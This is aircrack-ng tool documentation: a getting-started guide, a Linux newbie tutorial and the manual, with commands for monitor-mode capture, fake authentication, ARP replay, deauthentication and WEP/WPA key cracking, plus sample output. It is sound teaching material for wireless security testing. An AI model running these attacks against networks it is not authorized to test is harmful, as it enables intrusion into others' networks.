Aircrack-ng Official Documentation

################################################################
Tutorial: Getting Started

Version: 1.01 September 25, 2009
By: darkAudax
Introduction

Many people ask How do I get started?. This tutorial is intended to answer that question.

It is not intended to be a detailed How To tutorial, rather it is a road map to get you from where you are to the desired destination of using aircrack-ng. Once you get going, there is an abundance of materials on the wiki describing the tools in great detail and tutorials for various tasks.

This tutorial is focused on linux. Yes, I realize that linux is a problem for many people. Unfortunately Microsoft Windows simply does a poor job supporting the aircrack-ng suite. This is primarily due to the proprietary nature of the operating system and wireless card drivers. See Tutorial: Aircrack-ng Suite under Windows for Dummies for more details. Bottom line, don't use the aircrack-ng suite under Windows. There is little or no support for it.

The basic process consists of three steps:

    Determine the chipset in your wireless card
    Determine which of the three options you will use to run the aircrack-ng suite
    Get started using the aircrack-ng suite

The first step of determining the wireless card chipset is covered in the Determining the Wireless Card Chipset section below.

Next, you need to decide which method you will use to run the aircrack-ng suite. The three options are:

    Linux distribution of your choice plus the aircrack-ng suite
    Live CD which contains a version of the aircrack-ng suite
    VMWare image which contains a version of the aircrack-ng suite

There is a section below describing each option in more detail plus the advantages and disadvantages of each.

Finally, once you have aircrack-ng running, follow the Using Aircrack-ng Suite section below.

If you have problems, see the Resources section.

Please send any constructive feedback, positive or negative.

Have fun!
Determining the Wireless Card Chipset

The first step is determining which chipset your current wireless card contains. Chipsets are the electronics on a card which allow the card to function wirelessly. Not all chipsets are supported by aircrack-ng. Even if the chipset is supported, some of the functions may not work properly.

To determine the chipset of your card, follow Tutorial: Is My Wireless Card Compatible?. You need to know what chipset your card has in order to determine if it is supported by aircrack-ng.

Once you have determined the chipset in your wireless card, use Compatible Cards to determine if the chipset is compatible with the aircrack-ng suite. If it is, then it tells you which software drivers are required for your particular card.

If you don't have an existing wireless card or are considering purchasing another one, this same page has comments on various chipsets and cards which are known to work with aircrack-ng.
Linux Distribution of Your Choice

There are a large number of linux distributions available. They should all properly support the aircrack-ng suite.

Once you have your favorite linux distribution installed and functioning well, it is time to patch your wireless card driver. In the previous step you had determined the chipset in your wireless card. Lookup which driver is required for that particular chipset on Compatible Cards.

Then follow the installation instructions on the Installing Drivers page specific to your chipset. There is troubleshooting information on both this page and the individual driver pages.

Install the aircrack-ng suite using these instructions.

Once your wireless card is working well, jump to the Using Aircrack-ng Suite section below.

Advantages

    aircrack-ng is almost certainly guaranteed to work
    Provides the ability to run the latest versions of aircrack-ng and any wireless driver
    Provides the most flexibility

Disadvantages

    Requires much deeper knowledge of linux

Live CD

A live CD is a complete running linux distribution which you download and burn onto a CD. You then boot from this CD. Once booted and logged in, you are able to run the aircrack-ng suite with your wireless card. Knowing the chipset of your wireless card (determined in the first step), select a live CD which contains the patched version of the driver for your particular card. This is a key requirement. Needless to say, the live CD must also contain a copy of the aircrack-ng suite.

Here is a list of live CDs that are known to include the aircrack-ng suite.

Once you have booted from the CD and your wireless card is working well, jump to the Using Aircrack-ng Suite section below.

Advantages

    Works with any host operating system.
    No knowledge need to get aircrack-ng and the drivers working.
    Very portable.

Disadvantages

    Old version of aircrack-ng is included. May contain bugs and/or be missing features.
    Old versions of drivers are included. May contain bugs and/or be missing features.

VMWare Image

VMWare is a commercial product example of computer virtualization. Virtualization is running a virtual computer instance under a host operating system. VMWare supports a variety of host operating systems.

Here are the the currently available VMWare virtual machines. Here are the installation instructions.

Once you have installed and booted from the VMWare image and your wireless card is working well, jump to the Using Aircrack-ng Suite section below.

Advantages

    No knowledge need to get aircrack-ng and the drivers working.
    Very portable.

Disadvantages

    Works with a limited set of host operating systems.
    Only USB devices are supported.
    Old version of aircrack-ng is included. May contain bugs and/or be missing features. (but can be updated with some knowledge)
    Old versions of drivers are included. May contain bugs and/or be missing features. (but can be updated with some knowledge)

Using the Aircrack-ng Suite

You should always start by confirming that your wireless card can inject packets. This can be done by using the injection test.

Then start by following the Simple WEP Crack Tutorial.

Once you have mastered that technique, you can follow the other tutorials to learn aircrack-ng in more detail.

################################################################
Aircrack-ng Newbie Guide for Linux

Idea and initial work: ASPj
Additions by: a number of good souls
Last updated: Nov 21, 2018

This tutorial will give you the basics to get started using the aircrack-ng suite. It is impossible to provide every piece of information you need and cover every scenario. So be prepared to do some homework and research on your own. The Forum and the Wiki have lots of supplementary tutorials and information.

Although it does not cover all the steps from start to finish like this tutorial, the Simple WEP Crack tutorial covers the actual aircrack-ng steps in much more detail.
Setting up Hardware, Installing Aircrack-ng

The first step in getting aircrack-ng working properly on your Linux system is patching and installing the proper driver for your wireless card. Many cards work with multiple drivers, some of which provide the necessary features for using aircrack-ng, and some of which do not.

Needless to say, you need a wireless card which is compatible with the aircrack-ng suite. This is hardware which is fully compatible and can inject packets. A compatible wireless card can be used to crack a wireless access point in under an hour.

To determine to which category your card belongs to, see hardware compatibility page. Read Tutorial: Is My Wireless Card Compatible? if you don't know where to look in this table. It still does not hurt to read this tutorial to build your knowledge and confirm your card attributes.

First, you need to know which chipset is used in your wireless card and which driver you need for it. You will have determined this using the information in the previous paragraph. The drivers section will tell you which drivers you need.
Aircrack-ng installation

Get the latest copy of aircrack-ng from the homepage, use our packages or use a penetration testing distribution such as Kali Linux or Pentoo where Aircrack-ng is already installed and up to date.

To install aircrack-ng, refer to the documentation on the installation page.
IEEE 802.11 basics

Ok, now everything is ready, time to make a pit stop before the action finally starts and learn something about how wireless networks work.

The following chapter is very important, if something doesn't work as expected. Knowing what all is about helps you find the problem or helps you at least to describe it so someone else who can help you. This is a little bit scientific and maybe you feel like skipping it. However, a little knowledge is necessary to crack wireless networks and because it is a little more than just typing one command and letting aircrack do the rest.
How a wireless network is found

This is a short introduction into managed networks, these ones working with Access Points (AP). Every AP sends out about 10 so called beacon frames a second. These packets contain the following information:

    Name of the network (ESSID)
    If encryption is used (and what encryption is used; pay attention, that may not be always true just because the AP advertises it)
    What MBit data rates are supported
    Which channel the network is on

This information is then shown in your tool that connects to this network. It is shown when you let your card scan for networks with iwlist <interface> scan and when you run airodump-ng.

Every AP has a unique MAC address (48 bit, 6 pair of hexadecimal numbers). It looks like 00:01:23:4A:BC:DE. Every network hardware device has such an address and network devices communicate with each other by using this MAC address. So its basically like a unique name. MAC addresses are unique, no two network devices in the world have the same MAC address.
Connecting with a network

If you want to connect to a wireless network, there are some possibilities. In most cases, Open System Authentication is used. (Optional: If you want to learn more about authentication, check this out.)

Open System Authentication:

    Ask the AP for authentication.
    The AP answers: OK, you are authenticated.
    Ask the AP for association
    The AP answers: OK, you are now connected.


This is the simplest case, BUT there could be some problems if you are not legitimate to connect:

    WPA/WPA2 is in use, you need EAPOL authentication. The AP will deny you at step 2.
    Access Point has a list of allowed clients (MAC addresses), and it lets no one else connect. This is called MAC filtering.
    Access Point uses Shared Key Authentication, you need to supply the correct WEP key to be able to connect. (See the How to do shared key fake authentication? tutorial for advanced techniques.)

Simple sniffing and cracking
Discovering Networks

The first thing to do is looking out for a potential target. The aircrack-ng suite contains airodump-ng for this - but other programs like Kismet can be used too.

Prior to looking for networks, you must put your wireless card into what is called monitor mode. Monitor mode is a special mode that allows your computer to listen to every wireless packet. This monitor mode also allows you to optionally inject packets into a network. Injection will be covered later in this tutorial.

To put your wireless card into monitor mode using airmon-ng:

airmon-ng start wlan0

It will create create another interface, and append mon to it. So, wlan0 will become wlan0mon. To confirm it is in monitor mode, run iwconfig and confirm the mode.

Then, start airodump-ng to look out for networks:

airodump-ng wlan0mon

If airodump-ng could connect to the WLAN device, you'll see a screen like this:

airodump-ng hops from channel to channel and shows all access points it can receive beacons from. Channels 1 to 14 are used for 802.11b and g (in US, they only are allowed to use 1 to 11; 1 to 13 in Europe with some special cases; 1-14 in Japan). 802.11a is in the 5GHz and availability in different countries is more fragmented than on 2.4GHz. In general, known channels starts at 36 (32 in some countries) to 64 (68 in some countries) and 96 to 165. Wikipedia has more details on channel availability. The Linux Central Regulatory Domain Agent takes care of allowing/forbidding transmissions on the different channels for your country; however, it needs to be set appropriately.

The current channel is shown in the top left corner.

After a short time some APs and (hopefully) some associated clients will show up.

The upper data block shows the access points found:
BSSID 	The MAC address of the AP
RXQ 	Quality of the signal, when locked on a channel
PWR 	Signal strength. Some drivers don't report it
Beacons 	Number of beacon frames received. If you don't have a signal strength you can estimate it by the number of beacons: the more beacons, the better the signal quality
Data 	Number of data frames received
CH 	Channel the AP is operating on
MB 	Speed or AP Mode. 11 is pure 802.11b, 54 pure 802.11g. Values between are a mixture
ENC 	Encryption: OPN: no encryption, WEP: WEP encryption, WPA: WPA or WPA2 encryption, WEP?: WEP or WPA (don't know yet)
ESSID 	The network name. Sometimes hidden

The lower data block shows the clients found:
BSSID 	The MAC of the AP this client is associated to
STATION 	The MAC of the client itself
PWR 	Signal strength. Some drivers don't report it
Packets 	Number of data frames received
Probes 	Network names (ESSIDs) this client has probed

Now you should look out for a target network. It should have a client connected because cracking networks without a client is an advanced topic (See How to crack WEP with no clients). It should use WEP encryption and have a high signal strength. Maybe you can re-position your antenna to get a better signal. Often a few centimeters make a big difference in signal strength.

In the example above the net 00:01:02:03:04:05 would be the only possible target because it's the only one with an associated client. But it also has a high signal strength so it's really a good target to practice.
Sniffing IVs

Because of the channel hopping you won't capture all packets from your target net. So we want to listen just on one channel and additionally write all data to disk to be able to use it for cracking:

airodump-ng -c 11 --bssid 00:01:02:03:04:05 -w dump wlan0mon

With the -c parameter you tune to a channel and the parameter after -w is the prefix to the network dumps written to disk. The --bssid combined with the AP MAC address limits the capture to the one AP. The --bssid option is only available on new versions of airodump-ng.

Before being able to crack WEP you'll usually need between 40 000 and 85 000 different Initialization Vectors (IVs). Every data packet contains an IV. IVs can be re-used, so the number of different IVs is usually a bit lower than the number of data packets captured.

So you'll have to wait and capture 40K to 85K of data packets (IVs). If the network is not busy it will take a very long time. Often you can speed it up a lot by using an active attack (=packet replay). See the next chapter.
Cracking

If you've got enough IVs captured in one or more file, you can try to crack the WEP key:

aircrack-ng -b 00:01:02:03:04:05 dump-01.cap

The MAC after the -b option is the BSSID of the target and dump-01.cap the file containing the captured packets. You can use multiple files, just add all their names or you can use a wildcard such as dump*.cap.

For more information about aircrack-ng parameters, description of the output and usage see the manual.

The number of IVs you need to crack a key is not fixed. This is because some IVs are weaker and leak more information about the key than others. Usually these weak IVs are randomly mixed in between the stronger ones. So if you are lucky, you can crack a key with only 20 000 IVs. But often this it not enough and aircrack-ng will run a long time (up to a week or even longer with a high fudge factor) and then tell you the key could not be cracked. If you have more IVs cracking can be done a lot faster and is usually done in a few minutes, or even seconds. Experience shows that 40 000 to 85 000 IVs is usually enough for cracking.

There are some more advanced APs out there that use an algorithm to filter out weak IVs. The result is either that you can't get more than n different IVs from the AP or that you'll need millions (like 5 to 7 million) to crack the key. Search in the Forum, there are some threads about cases like this and what to do.
Active attacks
Injection support

Most devices don't support injection - at least not without patched drivers. Some only support certain attacks. Take a look at the compatibility page, column aireplay. Sometimes this table is not up-to-date, so if you see a NO for your driver there don't give up yet, but look at the driver homepage, the driver mailing list or our Forum. If you were able to successfully replay using a driver which is not listed as supported, don't hesitate to update the compatibility page table and add a link to a short howto. (To do this, request a wiki account on IRC.)

The first step is to make sure packet injection really works with your card and driver. The easiest way to test it is the injection test attack. Make sure to perform this test prior to proceeding. Your card must be able to successfully inject in order to perform the following steps.

You'll need the BSSID (AP MAC) and ESSID (network name) of an AP that does not do MAC filtering (e.g. your own) and must be in range of the AP.

Try to connect to your AP using aireplay-ng:

aireplay-ng --fakeauth 0 -e "your network ESSID" -a 00:01:02:03:04:05 wlan0mon

The value after -a is the BSSID of your AP.

If injection works you should see something like this:

12:14:06  Sending Authentication Request
12:14:06  Authentication successful
12:14:06  Sending Association Request
12:14:07  Association successful :-)

If not

    double-check ESSID and BSSID
    make sure your AP has MAC filtering disabled
    test it against another AP
    make sure your driver is properly patched and supported
    Instead of 0, try 6000 -o 1 -q 10

ARP replay

Now that we know that packet injection works, we can do something to massively speed up capturing IVs: ARP-request reinjection
The idea

ARP works (simplified) by broadcasting a query for an IP and the device that has this IP sends back an answer. Because WEP does not protect against replay, you can sniff a packet, send it out again and again and it is still valid. So you just have to capture and replay an ARP-request targeted at the AP to create lots of traffic (and sniff IVs).
The lazy way

First open a window with an airodump-ng sniffing for traffic (see above). aireplay-ng and airodump-ng can run together. Wait for a client to show up on the target network. Then start the attack:

aireplay-ng --arpreplay -b 00:01:02:03:04:05 -h 00:04:05:06:07:08 wlan0mon

-b specifies the target BSSID, -h the MAC of the connected client.

Now you have to wait for an ARP packet to arrive. Usually you'll have to wait for a few minutes (or look at the next chapter).

If you were successful, you'll see something like this:

Saving ARP requests in replay_arp-0627-121526.cap
You must also start airodump to capture replies.
Read 2493 packets (got 1 ARP requests), sent 1305 packets...

If you have to stop replaying, you don't have to wait for the next ARP packet to show up, but you can re-use the previously captured packet(s) with the -r <filename> option.

When using the ARP injection technique, you can use the PTW method to crack the WEP key. This dramatically reduces the number of data packets you need and also the time needed. You must capture the full packet in airodump-ng, meaning do not use the --ivs option when starting it. For aircrack-ng, use aircrack -z <file name>. (PTW is the default attack)

If the number of data packets received by airodump-ng sometimes stops increasing you maybe have to reduce the replay-rate. You do this with the -x <packets per second> option. I usually start out with 50 and reduce until packets are received continuously again. Better positioning of your antenna usually also helps.
The aggressive way

Most operating systems clear the ARP cache on disconnection. If they want to send the next packet after reconnection (or just use DHCP), they have to send out ARP requests. So the idea is to disconnect a client and force it to reconnect to capture an ARP-request. A side-effect is that you can sniff the ESSID and possibly a keystream during reconnection too. This comes in handy if the ESSID of your target is hidden, or if it uses shared-key authentication.

Keep your airodump-ng and aireplay-ng running. Open another window and run a deauthentication attack:

aireplay-ng --deauth 5 -a 00:01:02:03:04:05 -c 00:04:05:06:07:08 wlan0mon

-a is the BSSID of the AP, -c the MAC of the targeted client.

Wait a few seconds and your ARP replay should start running.

Most clients try to reconnect automatically. But the risk that someone recognizes this attack or at least attention is drawn to the stuff happening on the WLAN is higher than with other attacks.

################################################################

Aircrack-ng
Description

Aircrack-ng is an 802.11 WEP and WPA/WPA2-PSK key cracking program.

Aircrack-ng can recover the WEP key once enough encrypted packets have been captured with airodump-ng. This part of the aircrack-ng suite determines the WEP key using two fundamental methods. The first method is via the PTW approach (Pyshkin, Tews, Weinmann). The default cracking method is PTW. This is done in two phases. In the first phase, aircrack-ng only uses ARP packets. If the key is not found, then it uses all the packets in the capture. Please remember that not all packets can be used for the PTW method. This Tutorial: Packets Supported for the PTW Attack page provides details. An important limitation is that the PTW attack currently can only crack 40 and 104 bit WEP keys. The main advantage of the PTW approach is that very few data packets are required to crack the WEP key.

The other, older method is the FMS/KoreK method. The FMS/KoreK method incorporates various statistical attacks to discover the WEP key and uses these in combination with brute forcing. It requires more packets than PTW, but on the other hand is able to recover the passphrase when PTW sometimes fail.

Additionally, the program offers a dictionary method for determining the WEP key.

For cracking WPA/WPA2 pre-shared keys, only a dictionary method is used. A four-way handshake is required as input. For WPA handshakes, a full handshake is composed of four packets. However, aircrack-ng is able to work successfully with just 2 packets. EAPOL packets (2 and 3) or packets (3 and 4) are considered a full handshake.

SSE2, AVX, AVX2, and AVX512 support is included to dramatically speed up WPA/WPA2 key processing. With the exception of AVX512, all other instructions are built-in Aircrack-ng, and it will automatically select the fastest available for the CPU. For non-x86 CPUs, SIMD improvements are present as well.
Screenshot

LEGEND
1 = Keybyte
2 = Depth of current key search
3 = Byte the IVs leaked
4 = Votes indicating this is correct

How does it work?

The first method is the PTW method (Pychkine, Tews, Weinmann). The PTW method is fully described in the paper found on this web site. In 2005, Andreas Klein presented another analysis of the RC4 stream cipher. Klein showed that there are more correlations between the RC4 keystream and the key than the ones found by Fluhrer, Mantin, and Shamir and these may be additionally used to break WEP. The PTW method extends Klein's attack and optimizes it for usage against WEP. It essentially uses enhanced FMS techniques described in the following section. One particularly important constraint is that it only works with arp request/reply packets and cannot be employed against other traffic.

The second method is the FMS/Korek method which incorporates multiple techniques. The Techniques Papers on the links page lists many papers which describe these techniques in more detail and the mathematics behind them.

In this method, multiple techniques are combined to crack the WEP key:

    FMS ( Fluhrer, Mantin, Shamir) attacks - statistical techniques
    Korek attacks - statistical techniques
    Brute force

When using statistical techniques to crack a WEP key, each byte of the key is essentially handled individually. Using statistical mathematics, the possibility that a certain byte in the key is correctly guessed goes up to as much as 15% when the right initialization vector (IV) is captured for a particular key byte. Essentially, certain IVs leak the secret WEP key for particular key bytes. This is the fundamental basis of the statistical techniques.

By using a series of statistical tests called the FMS and Korek attacks, votes are accumulated for likely keys for each key byte of the secret WEP key. Different attacks have a different number of votes associated with them since the probability of each attack yielding the right answer varies mathematically. The more votes a particular potential key value accumulates, the more likely it is to be correct. For each key byte, the screen shows the likely secret key and the number of votes it has accumulated so far. Needless to say, the secret key with the largest number of votes is most likely correct but is not guaranteed. Aircrack-ng will subsequently test the key to confirm it.

Looking at an example will hopefully make this clearer. In the screenshot above, you can see, that at key byte 0 the byte 0xAE has collected some votes, 50 in this case. So, mathematically, it is more likely that the key starts with AE than with 11 (which is second on the same line) which is almost half as possible. That explains why the more data that is available, the greater the chances that aircrack-ng will determine the secret WEP key.

However the statistical approach can only take you so far. The idea is to get into the ball park with statistics then use brute force to finish the job. Aircrack-ng uses brute force on likely keys to actually determine the secret WEP key.

This is where the fudge factor comes in. Basically the fudge factor tells aircrack-ng how broadly to brute force. It is like throwing a ball into a field then telling somebody to ball is somewhere between 0 and 10 meters (0 and 30 feet) away. Versus saying the ball is somewhere between 0 and 100 meters (0 and 300 feet) away. The 100 meter scenario will take a lot longer to search then the 10 meter one but you are more likely to find the ball with the broader search. It is a trade off between the length of time and likelihood of finding the secret WEP key.

For example, if you tell aircrack-ng to use a fudge factor 2, it takes the votes of the most possible byte, and checks all other possibilities which are at least half as possible as this one on a brute force basis. The larger the fudge factor, the more possibilities aircrack-ng will try on a brute force basis. Keep in mind, that as the fudge factor gets larger, the number of secret keys to try goes up tremendously and consequently the elapsed time also increases. Therefore with more available data, the need to brute force, which is very CPU and time intensive, can be minimized.

In the end, it is all just simple mathematics and brute force!

For cracking WEP keys, a dictionary method is also included. For WEP, you may use either the statistical method described above or the dictionary method, not both at the same time. With the dictionary method, you first create a file with either ascii or hexadecimal keys. A single file can only contain one type, not a mix of both. This is then used as input to aircrack-ng and the program tests each key to determine if it is correct.

The techniques and the approach above do not work for WPA/WPA2 pre-shared keys. The only way to crack these pre-shared keys is via a dictionary attack. This capability is also included in aircrack-ng.

With pre-shared keys, the client and access point establish keying material to be used for their communication at the outset, when the client first associates with the access point. There is a four-way handshake between the client and access point. airodump-ng can capture this four-way handshake. Using input from a provided word list (dictionary), aircrack-ng duplicates the four-way handshake to determine if a particular entry in the word list matches the results the four-way handshake. If it does, then the pre-shared key has been successfully identified.

It should be noted that this process is very computationally intensive and so in practice, very long or unusual pre-shared keys are unlikely to be determined. A good quality word list will give you the best results. Another approach is to use a tool like john the ripper to generate password guesses which are in turn fed into aircrack-ng.
Explanation of the Depth Field and Fudge Factor

The best explanation is an example. We will look at a specific byte. All bytes are processed in the same manner.

You have the votes like in the screen shot above. For the first byte they look like: AE(50) 11(20) 71(20) 10(12) 84(12)

The AE, 11, 71, 10 and 84 are the possible secret key for key byte 0. The numbers in parentheses are the votes each possible secret key has accumulated so far.

Now if you decide to use a fudge factor of 3. Aircrack-ng takes the vote from the most possible byte AE(50):

50 / 3 = 16.666666

Aircrack-ng will test (brute force) all possible keys with a vote greater than 16.6666, resulting in

AE, 11, 71

being tested, so we have a total depth of three:

0 / 3 AE(50) 11(20) 71(20) 10(12) 84(12)

When aircrack-ng is testing keys with AE, it shows 0 / 3, if it has all keys tested with that byte, it switches to the next one (11 in this case) and displays:

1 / 3 11(20) 71(20) 10(12) 84(12)
Usage

aircrack-ng [options] <capture file(s)>

You can specify multiple input files (either in .cap or .ivs format) or use file name wildcarding. See Other Tips for examples. Also, you can run both airodump-ng and aircrack-ng at the same time: aircrack-ng will auto-update when new IVs are available.
Options
Common options
Option	Param.	Description
-a	amode	Force attack mode (1 = static WEP, 2 = WPA/WPA2-PSK)
-e	essid	If set, all IVs from networks with the same ESSID will be used. This option is also required for WPA/WPA2-PSK cracking if the ESSID is not broadcasted (hidden)
-b	bssid	Long version --bssid. Select the target network based on the access point's MAC address
-p	nbcpu	On SMP systems: # of CPU to use. This option is invalid on non-SMP systems
-q	none	Enable quiet mode (no status output until the key is found, or not)
-C	MACs	Long version --combine. Merge the given APs (separated by a comma) into virtual one
-l	file name	(Lowercase L, ell) logs the key to the file specified. Overwrites the file if it already exists
Static WEP cracking options
Option	Param.	Description
-c	none	Restrict the search space to alpha-numeric characters only (0x20 - 0x7F)
-t	none	Restrict the search space to binary coded decimal hex characters
-h	none	Restrict the search space to numeric characters (0x30-0x39) These keys are used by default in most Fritz!BOXes
-d	start	Long version --debug. Set the beginning of the WEP key (in hex), for debugging purposes
-m	maddr	MAC address to filter WEP data packets. Alternatively, specify -m ff:ff:ff:ff:ff:ff to use all and every IVs, regardless of the network
-n	nbits	Specify the length of the key: 64 for 40-bit WEP, 128 for 104-bit WEP, etc. The default value is 128
-i	index	Only keep the IVs that have this key index (1 to 4). The default behaviour is to ignore the key index
-f	fudge	By default, this parameter is set to 2 for 104-bit WEP and to 5 for 40-bit WEP. Specify a higher value to increase the bruteforce level: cracking will take more time, but with a higher likelyhood of success
-k	korek	There are 17 korek statistical attacks. Sometimes one attack creates a huge false positive that prevents the key from being found, even with lots of IVs. Try -k 1, -k 2,  -k 17 to disable each attack selectively
-x/-x0	none	Disable last keybytes brutforce
-x1	none	Enable last keybyte bruteforcing (default)
-x2	none	Enable last two keybytes bruteforcing
-X	none	Disable bruteforce multithreading (SMP only)
-s	none	Show the key in ASCII while cracking
-y	none	Experimental single bruteforce attack which should only be used when the standard attack mode fails with more than one million IVs
-z	none	Invokes the PTW WEP cracking method (Default in v1.x)
-P	number	Long version --ptw-debug. Invokes the PTW debug mode: 1 Disable klein, 2 PTW.
-K	none	Invokes the Korek WEP cracking method. (Default in v0.x)
-D	none	Long version --wep-decloak. Run in WEP decloak mode
-1	none	Long version --oneshot. Run only 1 try to crack key with PTW
-M	number	(WEP cracking) Specify the maximum number of IVs to use
-V	none	Long version --visual-inspection. Run in visual inspection mode (only with KoreK)
WEP and WPA-PSK cracking options
Option	Param.	Description
-w	words	Path to a wordlists or - without the quotes for standard in (stdin). Separate multiple wordlists by comma
-N	file	Create a new cracking session and save it to the specified file
-R	file	Restore cracking session from the specified file
WPA-PSK options
Option	Param.	Description
-E	file>	Create EWSA Project file v3
-j	file	Create Hashcat v3.6+ Capture file (HCCAPX)
-J	file	Create Hashcat Capture file
-S	none	WPA cracking speed test
-Z	sec	WPA cracking speed test execution length in seconds
-r	database	Utilizes a database generated by airolib-ng as input to determine the WPA key. Outputs an error message if aircrack-ng has not been compiled with sqlite support
SIMD Selection
Option	Param.	Description
--simd	optimization	Use user-specified SIMD optimization instead of the fastest one
--simd-list	none	Shows a list of the SIMD optimizations available
Other options
Option	Param.	Description
-H	none	Long version --help. Output help information
-u	none	Long form --cpu-detect. Provide information on the number of CPUs and features available such as MMX, SSE2, AVX, AVX2, AVX512
Usage Examples
WEP

The simplest case is to crack a WEP key. If you want to try this out yourself, here is a test file. The key to the test file matches the screen image above, it does not match the following example.

aircrack-ng -K 128bit.ivs
Where:

    128bit.ivs is the file name containing IVS.
    -K: Use KoreK attacks only

The program responds:

 Opening 128bit.ivs
 Read 684002 packets.

 #  BSSID              ESSID                     Encryption

 1  00:14:6C:04:57:9B                            WEP (684002 IVs)

 Choosing first network as target.

If there were multiple networks contained in the file then you are given the option to select which one you want. By default, aircrack-ng assumes 128 bit encryption.

The cracking process starts and once cracked, here is what it looks like:

                                              Aircrack-ng 1.4


                              [00:00:10] Tested 77 keys (got 684002 IVs)

 KB    depth   byte(vote)
  0    0/  1   AE( 199) 29(  27) 2D(  13) 7C(  12) FE(  12) FF(   6) 39(   5) 2C(   3) 00(   0) 08(   0) 
  1    0/  3   66(  41) F1(  33) 4C(  23) 00(  19) 9F(  19) C7(  18) 64(   9) 7A(   9) 7B(   9) F6(   9) 
  2    0/  2   5C(  89) 52(  60) E3(  22) 10(  20) F3(  18) 8B(  15) 8E(  15) 14(  13) D2(  11) 47(  10) 
  3    0/  1   FD( 375) 81(  40) 1D(  26) 99(  26) D2(  23) 33(  20) 2C(  19) 05(  17) 0B(  17) 35(  17) 
  4    0/  2   24( 130) 87( 110) 7B(  32) 4F(  25) D7(  20) F4(  18) 17(  15) 8A(  15) CE(  15) E1(  15) 
  5    0/  1   E3( 222) 4F(  46) 40(  45) 7F(  28) DB(  27) E0(  27) 5B(  25) 71(  25) 8A(  25) 65(  23) 
  6    0/  1   92( 208) 63(  58) 54(  51) 64(  35) 51(  26) 53(  25) 75(  20) 0E(  18) 7D(  18) D9(  18) 
  7    0/  1   A9( 220) B8(  51) 4B(  41) 1B(  39) 3B(  23) 9B(  23) FA(  23) 63(  22) 2D(  19) 1A(  17) 
  8    0/  1   14(1106) C1( 118) 04(  41) 13(  30) 43(  28) 99(  25) 79(  20) B1(  17) 86(  15) 97(  15) 
  9    0/  1   39( 540) 08(  95) E4(  87) E2(  79) E5(  59) 0A(  44) CC(  35) 02(  32) C7(  31) 6C(  30) 
 10    0/  1   D4( 372) 9E(  68) A0(  64) 9F(  55) DB(  51) 38(  40) 9D(  40) 52(  39) A1(  38) 54(  36) 
 11    0/  1   27( 334) BC(  58) F1(  44) BE(  42) 79(  39) 3B(  37) E1(  34) E2(  34) 31(  33) BF(  33) 

           KEY FOUND! [ AE:66:5C:FD:24:E3:92:A9:14:39:D4:27:4B ] 

NOTE: The ASCII WEP key is displayed only when 100% of the hex key can be converted to ASCII.

This key can then be used to connect to the network.

Next, we look at cracking WEP with a dictionary. In order to do this, we need dictionary files with ascii or hexadecimal keys to try. Remember, a single file can only have ascii or hexadecimal keys in it, not both.

WEP keys can be entered in hexadecimal or ascii. The following table describes how many characters of each type is required in your files.
WEP key length
in bits 	Hexadecimal
Characters 	Ascii
Characters
64	10	5
128	26	13
152	32	16
256	58	29

Example 64 bit ascii key: ABCDE
Example 64 bit hexadecimal key: 12:34:56:78:90 (Note the : between each two characters.)
Example 128 bit ascii key: ABCDEABCDEABC
Example 128 bit hexadecimal key: 12:34:56:78:90:12:34:56:78:90:12:34:56

To WEP dictionary crack a 64 bit key:

aircrack-ng -w h:hex.txt,ascii.txt -a 1 -n 64 -e teddy wep10-01.cap

Where:

    -w h:hex.txt,ascii.txt is the list of files to use. For files containing hexadecimal values, you must put a h: in front of the file name.
    -a 1 says that it is WEP
    -n 64 says it is 64 bits. Change this to the key length that matches your dictionary files.
    -e teddy is to optionally select the access point. Your could also use the -b option to select based on MAC address
    wep10-01.cap is the name of the file containing the data. It can be the full packet or an IVs only file. It must contain be a minimum of four IVs.

Here is a sample of the output:

                                              Aircrack-ng 1.4
 
 
                              [00:00:00] Tested 2 keys (got 13 IVs)
 
 KB    depth   byte(vote)
  0    0/  0   00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 
  1    0/  0   00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 
  2    0/  0   00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 
  3    0/  0   00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 
  4    0/  0   00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 
 
                       KEY FOUND! [ 12:34:56:78:90 ] 
      Probability: 100%

Lets look at a PTW attack example. Remember that this method requires arp request/reply packets as input. It must be the full packet and not just the IVs, meaning that the -- ivs option cannot be used when running airodump-ng. As well, it only works for 64 and 128 bit WEP encryption.

Enter the following command:

 aircrack-ng -z ptw*.cap  

Where:

    -z means use the PTW methodology to crack the wep key. Note: in v1.x, this is the default attack mode; use -K to revert to Korek.
    ptw*.cap are the capture files to use.

The systems responds:

 Opening ptw-01.cap
 Read 171721 packets.
    
 #  BSSID              ESSID                     Encryption
 
 1  00:14:6C:7E:40:80  teddy                     WEP (30680 IVs)
 
 Choosing first network as target.

Then:

                                              Aircrack-ng 1.4
 
                              [00:01:18] Tested 0/140000 keys (got 30680 IVs)
 
 KB    depth   byte(vote)
  0    0/  1   12( 170) 35( 152) AA( 146) 17( 145) 86( 143) F0( 143) AE( 142) C5( 142) D4( 142) 50( 140) 
  1    0/  1   34( 163) BB( 160) CF( 147) 59( 146) 39( 143) 47( 142) 42( 139) 3D( 137) 7F( 137) 18( 136) 
  2    0/  1   56( 162) E9( 147) 1E( 146) 32( 146) 6E( 145) 79( 143) E7( 142) EB( 142) 75( 141) 31( 140) 
  3    0/  1   78( 158) 13( 156) 01( 152) 5F( 151) 28( 149) 59( 145) FC( 145) 7E( 143) 76( 142) 92( 142) 
  4    0/  1   90( 183) 8B( 156) D7( 148) E0( 146) 18( 145) 33( 145) 96( 144) 2B( 143) 88( 143) 41( 141) 
 
                       KEY FOUND! [ 12:34:56:78:90 ] 
      Decrypted correctly: 100%

WPA

Now onto cracking WPA/WPA2 passphrases. Aircrack-ng can crack either types.

aircrack-ng -w password.lst *.cap
Where:

    -w password.lst is the name of the password file. Remember to specify the full path if the file is not located in the same directory.
    *.cap is name of group of files containing the captured packets. Notice in this case that we used the wildcard * to include multiple files.

The program responds:

 Opening wpa2.eapol.cap
 Opening wpa.cap
 Read 18 packets.

 #  BSSID              ESSID                     Encryption

 1  00:14:6C:7E:40:80  Harkonen                  WPA (1 handshake)
 2  00:0D:93:EB:B0:8C  test                      WPA (1 handshake)

